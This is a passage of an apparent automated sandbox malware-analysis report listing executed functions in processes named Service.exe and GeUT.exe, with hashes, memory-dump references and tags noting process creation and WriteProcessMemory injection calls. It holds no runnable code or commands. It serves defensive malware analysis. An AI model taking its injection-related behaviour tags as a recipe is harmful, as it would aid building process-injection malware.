Instruction Fuzzy Hash: 8F917A347002418FDB09AB78E858E6E7FE2FF8A300B10496DE146DB3A5EF749C059B91

Function 00C11157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9292a268daefe6fc007defe4cc798d4c79a40043fd325081172a8b215432d03c
Instruction ID: ae745a641d62571f96a5c4c3784b14476931e91d600340b0edbb2763adcd9f34
Opcode Fuzzy Hash: 9292a268daefe6fc007defe4cc798d4c79a40043fd325081172a8b215432d03c
Instruction Fuzzy Hash: E1317E71B00A418BDB15AB79982856E7AE2BFCA310314893DD167CB791DFB4ED048FD2

Function 00C11860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c613907e536fd5494f15863b76d62bd010d2789942ebe25ed8d893c0c0d80fbe
Instruction ID: 79ead6b03130b47fb34f33ed254b952a5d107b5b8ed6b8f6db55dc95de1ba51a
Opcode Fuzzy Hash: c613907e536fd5494f15863b76d62bd010d2789942ebe25ed8d893c0c0d80fbe
Instruction Fuzzy Hash: A621C071B042049FDB04BBF988193AEBEEAEFC9310B14842ED64AD7346DE748C0247A1

Function 00C11740 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6be04d9692c7e10ae96a4f5cc874a8b541ccf31519a6c768201ed0f9f0a28f
Instruction ID: d524368b19e60d7092dbfd1557fd15661eaeb1656a256573af3f9f1f285a0d6e
Opcode Fuzzy Hash: fb6be04d9692c7e10ae96a4f5cc874a8b541ccf31519a6c768201ed0f9f0a28f
Instruction Fuzzy Hash: 3F31C13490020ADFDB45EFB8D851AAD7FB2FF89300F2046A9D401A7365DB746A45EB91

Function 00C11750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6c5b0863eb074164101db855b455d046bfe7e53df08a297dc1e25d7507e651
Instruction ID: 493ceb224a3d2609a466a1fbdbed6daebb2b266f20f296a89f6997e2e579e410
Opcode Fuzzy Hash: 9c6c5b0863eb074164101db855b455d046bfe7e53df08a297dc1e25d7507e651
Instruction Fuzzy Hash: 2F21803490020ADFDB44EFB8D851AAD7FB2FF89304F104669D101A7355DBB06A45EB91

Function 00C10939 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c38559dbab6f2118d74531550411af3e04103d1d13e1caec8df168fa01ba994
Instruction ID: d68044558d3aa7f304f93e1fa7ae589b562264018478f2d552defec717efb20a
Opcode Fuzzy Hash: 0c38559dbab6f2118d74531550411af3e04103d1d13e1caec8df168fa01ba994
Instruction Fuzzy Hash: 9D21D130E04204CFCB14EBB8C5517AE7BE2EF85300F1480AEC849EB296EB705E45DB91

Function 00C10848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2369523943.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c10000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488309884dfc608b9a2e08c97a20ccdaaf6f0b2cadc1ff8f5606fe649ff07b19
Instruction ID: c16ed525409f2cc61e642d8ff293982833af4a07213134c9677a3d1103e7799f
Opcode Fuzzy Hash: 488309884dfc608b9a2e08c97a20ccdaaf6f0b2cadc1ff8f5606fe649ff07b19
Instruction Fuzzy Hash: C7119C34500906DFDB06FF1CF886E497BA5F789309B00AA5D95049B23DEAB4690FBF80

Analysis Process: Service.exePID: 1088, Parent PID: 7072COMMON

Executed Functions

Function 01230D95 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c978a7260537b4d6469e52ed1442018b34550f1e9426bb4edd5f354bd6184b12
Instruction ID: a42249247dd5faabcf721809f2be01bcd31d75a07bafb3ad4c72702af6d8e5dc
Opcode Fuzzy Hash: c978a7260537b4d6469e52ed1442018b34550f1e9426bb4edd5f354bd6184b12
Instruction Fuzzy Hash: 4D513B746002528FDB19ABF9E85856D7FE2FB942007005A3CE5668B399EF745C49CB81

Function 01231010 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c595fabbb5c79c798af23a238cbccd4c0b77da581951bcedf31329763110a9
Instruction ID: a93a34bb61f5fea33071997a7af642dec6d1fcc4716f356a621f179581ec7ef4
Opcode Fuzzy Hash: 28c595fabbb5c79c798af23a238cbccd4c0b77da581951bcedf31329763110a9
Instruction Fuzzy Hash: FE917F707002528FDB19ABB9D858A6D7BF2BF88200B00497CE126DB3A9DF749C458B81

Function 01231157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b786e9fc594d16f04a3b7f6ba4679971889556b8d4ebdf7f3b50cd32a078f5a6
Instruction ID: ccd6b961025e94900cdc727ae0c8841ce9c9246b189374c0506e991cdd707dd0
Opcode Fuzzy Hash: b786e9fc594d16f04a3b7f6ba4679971889556b8d4ebdf7f3b50cd32a078f5a6
Instruction Fuzzy Hash: B731AD71B10B418BEA29ABB9D81852E7AE2BFC52203008D3DD567CB784DF749C008BD2

Function 01231860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447ce2499fa5e3204a37627ba6c63e26b36e4847cdfa829ae3f95806dc197e2a
Instruction ID: cc89b8f5c1335850a673b36fcf81e19dd6e4f76dd0a77c5b8761e66ab7b216cd
Opcode Fuzzy Hash: 447ce2499fa5e3204a37627ba6c63e26b36e4847cdfa829ae3f95806dc197e2a
Instruction Fuzzy Hash: 6C2190B1B003059FDB48EBF9881836FBAEAEFC8350B14442ED55AD7386DE748C0147A2

Function 01231750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca737aef001833ecef2e60f0347311e8618f7b83a2b9fb0d50aded8a3b9c507f
Instruction ID: 2b386d491400bb0c2312038e3a2ff53ecfa8faacf0e8a72121824e2cdd40edd8
Opcode Fuzzy Hash: ca737aef001833ecef2e60f0347311e8618f7b83a2b9fb0d50aded8a3b9c507f
Instruction Fuzzy Hash: 14212B74A0021ADFDB49FFB9D8546AD7BB6FF84300F104A69E115AB349DB706A40CF51

Function 01230939 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef8ef03aaae62d826598b1362faac35232dcd1e1fbf8a6a22933f6f640aa0226
Instruction ID: 0235711df3c4f88b4d2956294f77b26940352b721f78e366bf385850d968fcc1
Opcode Fuzzy Hash: ef8ef03aaae62d826598b1362faac35232dcd1e1fbf8a6a22933f6f640aa0226
Instruction Fuzzy Hash: 87217F30E152098FDB99EFB8D4546AE7FF2EF85210F1081AED509AB256EB704E05CB91

Function 01230828 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544afa6b116f700a672606c346b6d6cee2581c3745a55eddfb63fbc1441959ac
Instruction ID: 2114dc0edb2d6d525c1182f2b4bbcdb9adb91473e3d460a4bcb3d453ddac00fc
Opcode Fuzzy Hash: 544afa6b116f700a672606c346b6d6cee2581c3745a55eddfb63fbc1441959ac
Instruction Fuzzy Hash: B921ED34505267CFDB06FF69F8909953FB5FB813047005B59E2149F229DAB46D49CF80

Function 01230848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2369229934.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1230000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ca7a38a60bb34f3049cc8f6722118debf26d54eadcabd9519faf0ca07dc8c1
Instruction ID: d1530c2c3cd3a61b1452d1e682df496676edff771953c3d382b6391c4fc487b0
Opcode Fuzzy Hash: 85ca7a38a60bb34f3049cc8f6722118debf26d54eadcabd9519faf0ca07dc8c1
Instruction Fuzzy Hash: A3116E34501227DFDF06FF6AF9849557BA9F7843047006B5CB2149F61DDAB479498F80

Analysis Process: Service.exePID: 2444, Parent PID: 7072COMMON

Executed Functions

Function 01420D95 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 856491f15805c7b5806c403b420a1785662350aac3dc28d790c31f6179f4d604
Instruction ID: 959c6fc1cff6d9a8a65910be67cca755c407494ae628f2acef1f476c057c93e7
Opcode Fuzzy Hash: 856491f15805c7b5806c403b420a1785662350aac3dc28d790c31f6179f4d604
Instruction Fuzzy Hash: D361AF706002468FDB19EB79E86886E7FA6FF89300740593DD54387769EF74AC058F81

Function 01421010 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b55b83510aa4cadc0f6c48cf46cd0ccb8437c30e80b50582da4d70c4577bc5
Instruction ID: 07d77416f7abbb0db2b5691cbc60412a993049ca3dfa7064e2bb8e2acdae32f5
Opcode Fuzzy Hash: e1b55b83510aa4cadc0f6c48cf46cd0ccb8437c30e80b50582da4d70c4577bc5
Instruction Fuzzy Hash: 8891C3347002069FDB15EB79D868A6E7FB6FF89300B40492DE546DB3A9DF74AC058B81

Function 01421157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41f3986b25d97be2ee7ba52780a10b76a236b3cda0222b18dc31ba1a8df18d3
Instruction ID: a3f8b85e0eadd2253946797790c41660fb18a3bfa3b8c1a93a222e2d62ca59a4
Opcode Fuzzy Hash: a41f3986b25d97be2ee7ba52780a10b76a236b3cda0222b18dc31ba1a8df18d3
Instruction Fuzzy Hash: 3831BC71B00B518FDB29AB7E841852E7AE6BFC4220700893ED557CBB84EF74AC008F91

Function 01421860 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7545a1f4a4c210f7e28b689d00d6700d79606244625b5b7ed9feefb7bb02783
Instruction ID: 0884bb821f5b7add9a2dd2da7e9de7ae9b18da4699754350392263efa625bf08
Opcode Fuzzy Hash: d7545a1f4a4c210f7e28b689d00d6700d79606244625b5b7ed9feefb7bb02783
Instruction Fuzzy Hash: BE21A161B002559BDB14ABFD885836FBAEBEFD8200F10442ED64AD7345EE348C0147A1

Function 01421740 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5adfb502fc32be331ba79c5408c66079506c248215921f061d045e36ac446106
Instruction ID: 7f74d08f976fb1842161c292ee3046b27c98aad991d930a506695a1447356c4e
Opcode Fuzzy Hash: 5adfb502fc32be331ba79c5408c66079506c248215921f061d045e36ac446106
Instruction Fuzzy Hash: 79314F74D0020AEFDB45EBB8D8A4AAD7FB6FF94300F10456AD505A7355EB706A40CB91

Function 01420939 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d9cc829c1f4aff0692541a52cd9daa9cab62a4e86906ba885dfdcdbcfd0761
Instruction ID: 5505ec7fa542b2afedaddb2dff948552c61bf889a2b4cc6148821055e4964b1f
Opcode Fuzzy Hash: d9d9cc829c1f4aff0692541a52cd9daa9cab62a4e86906ba885dfdcdbcfd0761
Instruction Fuzzy Hash: CB21DE30E082589FCB04EBB888543AE7FE6EF84200F9080AAD909EB395EB345D45C7D1

Function 01421750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21e6a134d4d79846627e68c4e5dfbf9a97b7fe6ce5e39976da4677490858e2a
Instruction ID: 43aab44e5468b9019cfff33dfaafb7e28f8e24b251d318c923abd29545266703
Opcode Fuzzy Hash: f21e6a134d4d79846627e68c4e5dfbf9a97b7fe6ce5e39976da4677490858e2a
Instruction Fuzzy Hash: 7E214F74A0020AEFDB45FBB8E8A4AAD7FB6FF98300F104569D105A7355EB706A40CB91

Function 01420828 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31995e32a85a8c77ed1b17e8cb744d1a8991a230f040f7c4f481c234ed705f2a
Instruction ID: 763208b17fee4d1d7677eab27f1dd5215246f522c5a88b2ec154535a3de1699d
Opcode Fuzzy Hash: 31995e32a85a8c77ed1b17e8cb744d1a8991a230f040f7c4f481c234ed705f2a
Instruction Fuzzy Hash: FB210E7410524FEFDB46EB28F8A09453F66FB81344B00696ED1049B21EDAB4694ADFC1

Function 01420848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2369674293.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1420000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa583399619c6df2be6be38313404fa2a73ce0ac4f56934d93c2a32085b96f0b
Instruction ID: 25c23d446e860c73f63f3c66189300ca82bfab1c5127363aa98181316e6ff47f
Opcode Fuzzy Hash: fa583399619c6df2be6be38313404fa2a73ce0ac4f56934d93c2a32085b96f0b
Instruction Fuzzy Hash: 32117A7410120FEFEB46FB28F9A4E557BA6FB84344B10AA6DD1049B21DDBB469099FC0

Analysis Process: GeUT.exePID: 1320, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	31.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	2

Executed Functions

Function 02734E34 Relevance: 1.7, APIs: 1, Instructions: 227
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735011

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 493d90b716d78475ae7b8435377a8367076b6e1fee963f04a096e3819392d4a0
Instruction ID: 1fc1e295a0b20e8c687dfb6deab5893f35cff214297c2a064073d27d0da6ddd8
Opcode Fuzzy Hash: 493d90b716d78475ae7b8435377a8367076b6e1fee963f04a096e3819392d4a0
Instruction Fuzzy Hash: 4581D074C00269CFDF21CFA8C940BEEBBF5AB49304F1491AAE508B7221DB709A85CF55

Function 02735C6C Relevance: 1.7, APIs: 1, Instructions: 227
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735E49

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8f615df0f2aef8215db57eee47c37ef9d8d1909befa3e1f83610e26cd9143b5f
Instruction ID: 3a0775d66312d3748f701e6f162d426c78b2674dd953baf7795c2aec3686ce9f
Opcode Fuzzy Hash: 8f615df0f2aef8215db57eee47c37ef9d8d1909befa3e1f83610e26cd9143b5f
Instruction Fuzzy Hash: 9581C274D00229DFDF21DFA9C940BEDBBB5BB49304F1091AAE509B7221DB709A85CF54

Function 02731B9C Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02731D79

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6b46e9c0e84e0f9bc0cbb96b0e8edd80592edaac0de03547f24588dc707bd0ca
Instruction ID: 95c9b9b244c287145d369dc96f39e7bcc2154c8fc7b4aeb58b31be666e7bd61f
Opcode Fuzzy Hash: 6b46e9c0e84e0f9bc0cbb96b0e8edd80592edaac0de03547f24588dc707bd0ca
Instruction Fuzzy Hash: 7F81C274C00269DFDF21CFA9C940BEDBBF5AB49300F1091AAE509B7261DB719A89CF54

Function 02736EA4 Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737081

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1b199668cfaa2316e8495c84830f8f8af5c8954c39a585d29b667d1bc7ece401
Instruction ID: 7a65c96c6c5997997cadf9cfb2c15c083af24f31bfdfa1597f54381d02cd31b6
Opcode Fuzzy Hash: 1b199668cfaa2316e8495c84830f8f8af5c8954c39a585d29b667d1bc7ece401
Instruction Fuzzy Hash: 6081D3B5C00269DFDF25CFA8C940BEDBBB5BB49300F1091AAE508B7211DB709A85CF54

Function 02734024 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737081

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c3f09eae5aaf0ff70c7a824a2b5c43a5d673cf2c16eb08256cbc5b4a95bcab15
Instruction ID: 5448b4bf4dc8b58f9e20c587e6ebb577ec654e6bd02bfc7db08b981bf824e071
Opcode Fuzzy Hash: c3f09eae5aaf0ff70c7a824a2b5c43a5d673cf2c16eb08256cbc5b4a95bcab15
Instruction Fuzzy Hash: 1E81C2B4C00269DFDF25CFA9C944BEDBBB5BB49300F1091AAE508B7261DB709A85CF54

Function 0273614C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737EB9

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b27b38917190ef9c35d29f840b81b6abaa1ee5e2e1068877ddd2342ca8721dd5
Instruction ID: 8e4128130d27c0c78a63ace4bf31a25eee8f63525e0785299dd2edb9e2a33078
Opcode Fuzzy Hash: b27b38917190ef9c35d29f840b81b6abaa1ee5e2e1068877ddd2342ca8721dd5
Instruction Fuzzy Hash: 9981D0B4C00229CFDF25CFA9C980BEDBBB5BB49304F1091AAE509B7251DB709A85CF54

Function 02737CDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737EB9

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6372f97c4f675b70861d3a43765c7d828b18389ad0b408c8608064fcee36151b
Instruction ID: 8f994130109fb07426a5a8c22673f878e2d9682a8ce1939dc9db9e647f56ef74
Opcode Fuzzy Hash: 6372f97c4f675b70861d3a43765c7d828b18389ad0b408c8608064fcee36151b
Instruction Fuzzy Hash: C481D1B5C00229DFDF25CFA9C980BEDBBB5AB49304F1091AAE508B7251DB709A85CF54

Function 02731BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02731D79

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: de5e1cbc0d27bf3f5bb1e74c44017491c39dd0f18e34ab6312e7f8bbcea8503b
Instruction ID: d3e83c8fe357d9df60f98ab30ac0d0143980d91eb84ac3637277186e378a5a1f
Opcode Fuzzy Hash: de5e1cbc0d27bf3f5bb1e74c44017491c39dd0f18e34ab6312e7f8bbcea8503b
Instruction Fuzzy Hash: C781B274C00269DFDF21CFA9C940BDDBBF5AB49300F1091AAE509B7261DB719A89CF54

Function 02734E40 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735011

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4cf727d17b2450c67021df46d0cf2bb6a883f879dc30dc85f32f6526f52e96f6
Instruction ID: 33e90d61b8659e8e2027157611b24fa485ba9b9a321c0a7e2ed7cf556e37fd21
Opcode Fuzzy Hash: 4cf727d17b2450c67021df46d0cf2bb6a883f879dc30dc85f32f6526f52e96f6
Instruction Fuzzy Hash: 8781C074C00269CFDF21CFA9C940BDEBBB5AB49304F1491AAE508B7261DB709A85CF55

Function 02735C78 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735E49

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9feb691a485222aa70148ce94c55189624e7ddf432cc0f9393214960da16464f
Instruction ID: 901fa7cd6a22b34248616ff4da0650aea824cd5858dd5a430453184bb4f84dcd
Opcode Fuzzy Hash: 9feb691a485222aa70148ce94c55189624e7ddf432cc0f9393214960da16464f
Instruction Fuzzy Hash: FA81B174D00229DFDF21CFA9C980BDEBBF5AB49300F1091AAE509B7261DB709A85CF54

Function 027321F0 Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027322C6

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 38e2b493c2ff438af7fc381a16fbb12032ce8f7d1f3fcfbe565d6a3870180aed
Instruction ID: c2e388024a41454944cb4632a7ccc64102cdcf821f89a8b81384f299b9bcfae5
Opcode Fuzzy Hash: 38e2b493c2ff438af7fc381a16fbb12032ce8f7d1f3fcfbe565d6a3870180aed
Instruction Fuzzy Hash: 554198B5D002589FCF01CFA9D984AEEFBF1BB49314F24902AE918B7211D374AA45CB64

Function 027321F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027322C6

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
